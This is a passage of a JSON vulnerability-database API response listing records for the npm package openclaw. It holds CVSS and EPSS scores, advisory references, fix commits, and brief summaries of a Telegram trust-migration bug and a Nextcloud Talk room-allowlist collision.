                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "GHSA-48vw-m3qc-wr99"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3pqp-bneb-mbc4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90102?format=api",
            "vulnerability_id": "VCID-3wsw-d4z2-dydt",
            "summary": "OpenClaw: Telegram legacy allowFrom migration fans default-account trust into all named accounts\n## Summary\nTelegram legacy allowFrom migration fans default-account trust into all named accounts\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: low\n- Assessment: Shipped v2026.3.28 Telegram migration fans legacy default-account allowFrom trust into named accounts, which is an in-scope auth-boundary bug and low fits.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `d8c68c8d4265ea6fa5e8c5e056534c351bddef37` — 2026-03-31T12:51:38+01:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @smaeljaish771 for reporting.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/d8c68c8d4265ea6fa5e8c5e056534c351bddef37",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/d8c68c8d4265ea6fa5e8c5e056534c351bddef37"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f693-58pc-2gfr",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f693-58pc-2gfr"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-f693-58pc-2gfr",
                    "reference_id": "GHSA-f693-58pc-2gfr",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-f693-58pc-2gfr"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "GHSA-f693-58pc-2gfr"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3wsw-d4z2-dydt"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91662?format=api",
            "vulnerability_id": "VCID-3xeb-phgc-vkcg",
            "summary": "OpenClaw: Nextcloud Talk room allowlist matched colliding room names instead of stable room tokens\n## Summary\nNextcloud Talk room authorization matched on collidable room names instead of the stable room token, allowing policy confusion across similarly named rooms.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/nextcloud-talk/src/inbound.ts now resolves allowlist policy from roomToken-backed room identity.\n- extensions/nextcloud-talk/src/policy.ts now keys room authorization on stable room tokens instead of display names.\n\nOpenClaw thanks @zpbrent for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35624",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00069",
                            "scoring_system": "epss",
                            "scoring_elements": "0.21321",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00069",
                            "scoring_system": "epss",
                            "scoring_elements": "0.21369",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00069",
                            "scoring_system": "epss",
                            "scoring_elements": "0.21384",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35624"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:15:46Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:15:46Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xhq5-45pm-2gjr",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:15:46Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xhq5-45pm-2gjr"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35624",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35624"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-policy-confusion-via-room-name-collision-in-nextcloud-talk",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:15:46Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-policy-confusion-via-room-name-collision-in-nextcloud-talk"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-xhq5-45pm-2gjr",
                    "reference_id": "GHSA-xhq5-45pm-2gjr",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-xhq5-45pm-2gjr"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
